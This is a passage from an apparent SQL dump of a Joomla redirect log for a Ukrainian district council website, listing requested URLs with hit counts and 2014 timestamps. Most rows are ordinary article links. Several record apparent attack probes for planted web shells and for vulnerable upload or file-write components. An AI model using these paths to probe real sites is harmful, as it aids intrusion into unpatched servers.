00:00:00',301),(6475,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-02 13:57:12','0000-00-00 00:00:00',301),(6476,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=uk','','','',2,0,'2014-10-02 14:05:23','0000-00-00 00:00:00',301),(6477,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-02 14:09:27','0000-00-00 00:00:00',301),(6478,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-02 14:09:29','0000-00-00 00:00:00',301),(6479,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-02 14:12:25','0000-00-00 00:00:00',301),(6480,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-02 14:35:35','0000-00-00 00:00:00',301),(6481,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1308:2014-05-05-05-20-51&catid=11&lang=uk&Itemid=0','','','',2,0,'2014-10-02 14:37:25','0000-00-00 00:00:00',301),(6482,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-02 14:40:31','0000-00-00 00:00:00',301),(6483,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1166:2014-01-06-08-21-04&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-02 14:41:38','0000-00-00 00:00:00',301),(6484,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=en&Itemid=0','','','',3,0,'2014-10-02 14:45:16','0000-00-00 00:00:00',301),(6485,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56&Itemid=97&lang=ru','','','',3,0,'2014-10-02 14:46:50','0000-00-00 00:00:00',301),(6486,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-10-02 14:55:10','0000-00-00 00:00:00',301),(6487,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56:--03022014-&Itemid=97&lang=ru','','','',5,0,'2014-10-02 14:55:14','0000-00-00 00:00:00',301),(6488,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-10-02 15:04:15','0000-00-00 00:00:00',301),(6489,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-10-02 15:05:22','0000-00-00 00:00:00',301),(6490,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-02 15:11:19','0000-00-00 00:00:00',301),(6491,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-02 15:15:23','0000-00-00 00:00:00',301),(6492,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-10-02 15:23:27','0000-00-00 00:00:00',301),(6493,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-02 15:36:19','0000-00-00 00:00:00',301),(6494,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=32&lang=uk','','','',5,0,'2014-10-02 15:40:08','0000-00-00 00:00:00',301),(6495,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1223:--28-----6-&catid=11&lang=en&Itemid=0','','','',4,0,'2014-10-02 15:43:23','0000-00-00 00:00:00',301),(6496,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-10-02 16:16:29','0000-00-00 00:00:00',301),(6497,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56&Itemid=97&lang=ru','','','',6,0,'2014-10-02 16:18:45','0000-00-00 00:00:00',301),(6498,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&Itemid=32&lang=en','','','',5,0,'2014-10-02 16:30:02','0000-00-00 00:00:00',301),(6499,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=ru&Itemid=0','','','',5,0,'2014-10-02 16:34:43','0000-00-00 00:00:00',301),(6500,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=ru&Itemid=','','','',5,0,'2014-10-02 16:43:04','0000-00-00 00:00:00',301),(6501,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1015:-200-&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-02 16:46:31','0000-00-00 00:00:00',301),(6502,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56:--03022014-&Itemid=97&lang=ru','','','',2,0,'2014-10-02 16:46:48','0000-00-00 00:00:00',301),(6503,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=uk&Itemid=','','','',3,0,'2014-10-02 16:58:06','0000-00-00 00:00:00',301),(6504,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-10-02 17:26:16','0000-00-00 00:00:00',301),(6505,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1033:2013-06-18-12-58-36&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-02 17:29:37','0000-00-00 00:00:00',301),(6506,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1111:2013-10-22-16-06-36&lang=ru&option=com_content&view=article','','','',3,0,'2014-10-02 17:29:41','0000-00-00 00:00:00',301),(6507,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57:--15042014-&Itemid=98&lang=ru','','','',3,0,'2014-10-02 17:33:03','0000-00-00 00:00:00',301),(6508,'http://www.malyn-rayrada.org.ua/images/stories/food.php?baca','','','',6,0,'2014-10-02 17:44:38','0000-00-00 00:00:00',301),(6509,'http://www.malyn-rayrada.org.ua/images/stories/wawalo.php?baca','','','',4,0,'2014-10-02 17:44:46','0000-00-00 00:00:00',301),(6510,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1280:-2014-&catid=57&Itemid=98&lang=ru','','','',2,0,'2014-10-02 17:48:41','0000-00-00 00:00:00',301),(6511,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1265:2014-04-01-11-43-46&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-10-02 18:10:00','0000-00-00 00:00:00',301),(6512,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1122:-1-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',6,0,'2014-10-02 18:13:45','0000-00-00 00:00:00',301),(6513,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=en&Itemid=','','','',4,0,'2014-10-02 18:36:50','0000-00-00 00:00:00',301),(6514,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=919:2013-01-31-10-15-40&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-02 18:59:35','0000-00-00 00:00:00',301),(6515,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=892:2013-01-08-13-26-18&lang=uk&option=com_content&view=article','','','',1,0,'2014-10-02 18:59:37','0000-00-00 00:00:00',301),(6516,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=en&Itemid=','','','',6,0,'2014-10-02 19:02:33','0000-00-00 00:00:00',301),(6517,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=categories&lang=en&Itemid=0','','','',2,0,'2014-10-02 19:17:39','0000-00-00 00:00:00',301),(6518,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-02 19:18:35','0000-00-00 00:00:00',301),(6519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11&lang=en&Itemid=','','','',4,0,'2014-10-02 19:32:49','0000-00-00 00:00:00',301),(6520,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1007:-4-&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-02 19:36:28','0000-00-00 00:00:00',301),(6521,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=941:2013-02-27-14-30-15&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-02 20:57:11','0000-00-00 00:00:00',301),(6522,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1125:2013-10-31-07-20-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-10-02 21:43:06','0000-00-00 00:00:00',301),(6523,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=910:-22-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-10-02 22:34:06','0000-00-00 00:00:00',301),(6524,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1057:--22072013--2100-&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-10-03 00:14:36','0000-00-00 00:00:00',301),(6525,'http://www.malyn-rayrada.org.ua/sermons/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-10-03 00:37:40','0000-00-00 00:00:00',301),(6526,'http://www.malyn-rayrada.org.ua/sermons/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=a','','','',1,0,'2014-10-03 00:37:43','0000-00-00 00:00:00',301),(6527,'http://www.malyn-rayrada.org.ua/sermons/components/com_community/index.html','','','',1,0,'2014-10-03 00:37:46','0000-00-00 00:00:00',301),(6528,'http://www.malyn-rayrada.org.ua/sermons/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-03 00:37:50','0000-00-00 00:00:00',301),(6529,'http://www.malyn-rayrada.org.ua/sermons/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-03 00:37:54','0000-00-00 00:00:00',301),(6530,'http://www.malyn-rayrada.org.ua/sermons/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-03 00:38:00','0000-00-00 00:00:00',301),(6531,'http://www.malyn-rayrada.org.ua/sermons/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1','','','',1,0,'2014-10-03 00:38:01','0000-00-00 00:00:00',301),(6532,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1171:2014-01-11-09-58-40&lang=ru&option=com_content&view=article','','','',2,0,'2014-10-03 00:39:26','0000-00-00 00:00:00',301),(6533,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1005:-7-1943-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2014-10-03 05:03:04','0000-00-00 00:00:00',301),(6534,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1126:2013-10-31-12-52-35&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-03 06:25:52','0000-00-00 00:00:00',301),(6535,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:----------2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2014-10-03 07:33:15','0000-00-00 00:00:00',301),(6536,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=918:----------2013-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-10-03 07:34:01','0000-00-00 00:00:00',301),(6537,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1295:-------2014-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-10-03 07:35:16','0000-00-00 00:00:00',301),(6538,'http://malyn-rayrada.org.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder=','','','',5,0,'2014-10-03 07:48:15','0000-00-00 00:00:00',301),(6539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53&Itemid=94&lang=ru','','','',8,0,'2014-10-03 08:00:44','0000-00-00 00:00:00',301),(6540,'http://www.malyn-rayrada.org.ua/index.php/--30122010-','','','',1,0,'2014-10-03 09:55:39','0000-00-00 00:00:00',301),(6541,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56:--03022014-&Itemid=97&lang=en','','','',16,0,'2014-10-03 10:46:43','0000-00-00 00:00:00',301),(6542,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56:--03022014-&Itemid=97&lang=ru','','','',10,0,'2014-10-03 10:46:48','0000-00-00 00:00:00',301),(6543,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=56:--03022014-&Itemid=97&lang=ru','','','',10,0,'2014-10-03 10:46:53','0000-00-00 00:00:00',301),(6544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=56:--03022014-&Itemid=97&lang=uk','','','',6,0,'2014-10-03 10:46:58','0000-00-00 00:00:00',301),(6545,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-03 10:47:02','0000-00-00 00:00:00',301),(6546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-03 10:47:05','0000-00-00 00:00:00',301),(6547,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-03 10:47:09','0000-00-00 00:00:00',301),(6548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=ru&Itemid=','','','',4,0,'2014-10-03 10:47:19','0000-00-00 00:00:00',301),(6549,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-10-03 10:47:24','0000-00-00 00:00:00',301),(6550,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=36&Itemid=70&lang=en','','','',3,0,'2014-10-03 10:47:28','0000-00-00 00:00:00',301),(6551,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1293:-2014-&catid=36&Itemid=70&lang=ru','','','',3,0,'2014-10-03 10:47:32','0000-00-00 00:00:00',301),(6552,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=36&Itemid=70&lang=en','','','',1,0,'2014-10-03 10:47:37','0000-00-00 00:00:00',301),(6553,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=en&Itemid=','','','',5,0,'2014-10-03 10:47:44','0000-00-00 00:00:00',301),(6554,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=en&Itemid=','','','',3,0,'2014-10-03 10:47:54','0000-00-00 00:00:00',301),(6555,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=ru&Itemid=','','','',1,0,'2014-10-03 10:47:57','0000-00-00 00:00:00',301),(6556,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=uk&Itemid=','','','',1,0,'2014-10-03 10:48:01','0000-00-00 00:00:00',301),(6557,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-10-03 11:49:02','0000-00-00 00:00:00',301),(6558,'http://www.malyn-rayrada.org.ua/~kotiax2z/components/com_community/index.html','','','',1,0,'2014-10-03 14:03:15','0000-00-00 00:00:00',301),(6559,'http://www.malyn-rayrada.org.ua/~kotiax2z/components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-03 14:03:18','0000-00-00 00:00:00',301),(6560,'http://www.malyn-rayrada.org.ua/~kotiax2z/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writeToFile.php','','','',1,0,'2014-10-03 14:03:22','0000-00-00 00:00:00',301),(6561,'http://www.malyn-rayrada.org.ua/~kotiax2z/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',1,0,'2014-10-03 14:03:29','0000-00-00 00:00:00',301),(6562,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11&lang=en','','','',5,0,'2014-10-03 14:46:19','0000-00-00 00:00:00',301),(6563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1186:-2013-i-2014-&catid=56:--03022014-&Itemid=97&lang=en','','','',5,0,'2014-10-03 15:13:06','0000-00-00 00:00:00',301),(6564,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56:--03022014-&Itemid=97&lang=en','','','',2,0,'2014-10-03 15:13:15','0000-00-00 00:00:00',301),(6565,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1187:2014-01-28-09-43-51&catid=56:--03022014-&Itemid=97&lang=uk','','','',1,0,'2014-10-03 15:13:23','0000-00-00 00:00:00',301),(6566,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56:--03022014-&Itemid=97&lang=en','','','',5,0,'2014-10-03 15:13:34','0000-00-00 00:00:00',301),(6567,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1190:-2014-&catid=56:--03022014-&Itemid=97&lang=uk','','','',10,0,'2014-10-03 15:13:42','0000-00-00 00:00:00',301),(6568,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56:--03022014-&Itemid=97&lang=en','','','',4,0,'2014-10-03 15:13:46','0000-00-00 00:00:00',301),(6569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1191:-2014-&catid=56:--03022014-&Itemid=97&lang=ru','','','',9,0,'2014-10-03 15:13:48','0000-00-00 00:00:00',301),(6570,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=ru','','','',10,0,'2014-10-03 15:13:55','0000-00-00 00:00:00',301),(6571,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1193:-2014-2015-&catid=56:--03022014-&Itemid=97&lang=en','','','',7,0,'2014-10-03 15:13:59','0000-00-00 00:00:00',301),(6572,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56:--03022014-&Itemid=97&lang=en','','','',6,0,'2014-10-03 15:14:07','0000-00-00 00:00:00',301),(6573,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1194:-2012-2015-&catid=56:--03022014-&Itemid=97&lang=ru','','','',12,0,'2014-10-03 15:14:10','0000-00-00 00:00:00',301),(6574,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1195:2014-01-28-13-01-27&catid=56:--03022014-&Itemid=97&lang=en','','','',26,0,'2014-10-03 15:14:14','0000-00-00 00:00:00',301),(6575,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&lang=ru','','','',4,0,'2014-10-03 15:14:48','0000-00-00 00:00:00',301),(6576,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1236:2014-03-07-06-36-44&catid=11&lang=ru','','','',2,0,'2014-10-03 15:14:59','0000-00-00 00:00:00',301),(6577,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=ru','','','',1,0,'2014-10-03 15:15:04','0000-00-00 00:00:00',301),(6578,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=en','','','',11,0,'2014-10-03 15:15:06','0000-00-00 00:00:00',301),(6579,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1238:2014-03-09-06-41-00&catid=11&lang=ru','','','',10,0,'2014-10-03 15:15:08','0000-00-00 00:00:00',301),(6580,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1239:--29----6-&catid=11&lang=ru','','','',2,0,'2014-10-03 15:15:13','0000-00-00 00:00:00',301),(6581,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=en','','','',10,0,'2014-10-03 15:15:30','0000-00-00 00:00:00',301),(6582,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1250:2014-03-24-07-04-57&catid=11&lang=ru','','','',3,0,'2014-10-03 15:15:33','0000-00-00 00:00:00',301),(6583,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=en','','','',2,0,'2014-10-03 15:15:36','0000-00-00 00:00:00',301),(6584,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11&lang=ru','','','',4,0,'2014-10-03 15:15:38','0000-00-00 00:00:00',301),(6585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=en','','','',2,0,'2014-10-03 15:15:44','0000-00-00 00:00:00',301),(6586,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1256:2014-03-27-17-22-43&catid=11&lang=ru','','','',4,0,'2014-10-03 15:15:47','0000-00-00 00:00:00',301),(6587,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1257:2014-03-29-18-03-31&catid=11&lang=ru','','','',4,0,'2014-10-03 15:15:51','0000-00-00 00:00:00',301),(6588,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1258:2014-03-31-06-18-35&catid=11&lang=ru','','','',5,0,'2014-10-03 15:15:56','0000-00-00 00:00:00',301),(6589,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1264:2014-04-01-11-27-13&catid=11&lang=ru','','','',2,0,'2014-10-03 15:16:01','0000-00-00 00:00:00',301),(6590,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1267:2014-04-03-21-52-50&catid=11&lang=ru','','','',4,0,'2014-10-03 15:16:15','0000-00-00 00:00:00',301),(6591,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11&lang=ru','','','',6,0,'2014-10-03 15:16:29','0000-00-00 00:00:00',301),(6592,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1282:-30-6-&catid=11&lang=en','','','',1,0,'2014-10-03 15:16:31','0000-00-00 00:00:00',301),(6593,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=en','','','',1,0,'2014-10-03 15:16:35','0000-00-00 00:00:00',301),(6594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=ru','','','',5,0,'2014-10-03 15:16:37','0000-00-00 00:00:00',301),(6595,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=en','','','',1,0,'2014-10-03 15:16:41','0000-00-00 00:00:00',301),(6596,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1284:2014-04-17-13-00-18&catid=11&lang=ru','','','',4,0,'2014-10-03 15:16:44','0000-00-00 00:00:00',301),(6597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=en','','','',1,0,'2014-10-03 15:16:47','0000-00-00 00:00:00',301),(6598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11&lang=ru','','','',2,0,'2014-10-03 15:16:50','0000-00-00 00:00:00',301),(6599,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=en','','','',1,0,'2014-10-03 15:16:52','0000-00-00 00:00:00',301),(6600,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1291:2014-04-23-11-37-34&catid=11&lang=ru','','','',5,0,'2014-10-03 15:16:54','0000-00-00 00:00:00',301),(6601,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1292:-i-&catid=11&lang=en','','','',1,0,'2014-10-03 15:16:56','0000-00-00 00:00:00',301),(6602,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1296:116---&catid=15&lang=en','','','',1,0,'2014-10-03 15:17:01','0000-00-00 00:00:00',301),(6603,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=en','','','',1,0,'2014-10-03 15:17:06','0000-00-00 00:00:00',301),(6604,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1298:2014-04-24-11-02-55&catid=11&lang=ru','','','',5,0,'2014-10-03 15:17:08','0000-00-00 00:00:00',301),(6605,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=911:2013-01-22-13-27-41&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-10-03 15:47:08','0000-00-00 00:00:00',301),(6606,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1236:2014-03-07-06-36-44&lang=ru&option=com_content&view=article','','','',1,0,'2014-10-03 16:40:22','0000-00-00 00:00:00',301),(6607,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1013:2013-06-01-03-58-38&lang=ru&option=com_content&view=article','','','',4,0,'2014-10-03 16:58:10','0000-00-00 00:00:00',301),(6608,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1072:-24-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-10-03 17:10:55','0000-00-00 00:00:00',301),(6609,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1064:2013-08-09-07-52-21&Itemid=14&lang=en','','','',1,0,'2014-10-03 17:35:37','0000-00-00 00:00:00',301),(6610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1066:-23-&Itemid=14&lang=en','','','',1,0,'2014-10-03 17:36:03','0000-00-00 00:00:00',301),(6611,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&lang=en','','','',1,0,'2014-10-03 17:36:05','0000-00-00 00:00:00',301),(6612,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&Itemid=14&lang=en','','','',1,0,'2014-10-03 17:36:06','0000-00-00 00:00:00',301),(6613,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1063:2013-08-02-17-32-04&Itemid=14&lang=en','','','',1,0,'2014-10-03 17:36:09','0000-00-00 00:00:00',301),(6614,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1062:2013-07-29-13-33-29&Itemid=14&lang=en','','','',1,0,'2014-10-03 17:36:10','0000-00-00 00:00:00',301),(6615,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&catid=11&Itemid=14&lang=uk','','','',8,0,'2014-10-03 17:36:13','0000-00-00 00:00:00',301),(6616,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1060:2013-07-27-10-13-15&Itemid=14&lang=en','','','',1,0,'2014-10-03 17:36:14','0000-00-00 00:00:00',301),(6617,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1100:2013-10-02-18-03-10&lang=uk','','','',1,0,'2014-10-03 17:36:16','0000-00-00 00:00:00',301),(6618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&Itemid=70&lang=ru','','','',1,0,'2014-10-03 17:36:35','0000-00-00 00:00:00',301),(6619,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1087:--------12--2013---398-l-------2013-r---19--2013---416-l-------2013-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',2,0,'2014-10-03 17:36:44','0000-00-00 